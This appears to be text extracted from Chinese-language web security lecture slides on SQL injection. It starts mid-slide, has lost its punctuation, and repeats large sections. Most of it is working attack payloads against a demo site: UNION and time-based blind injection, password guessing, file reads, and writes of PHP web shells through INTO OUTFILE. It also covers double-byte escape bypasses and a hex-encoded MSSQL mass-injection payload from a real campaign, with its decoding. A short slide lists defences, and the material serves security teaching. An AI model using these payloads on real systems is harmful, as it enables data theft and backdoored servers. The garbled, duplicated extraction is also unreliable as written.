ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
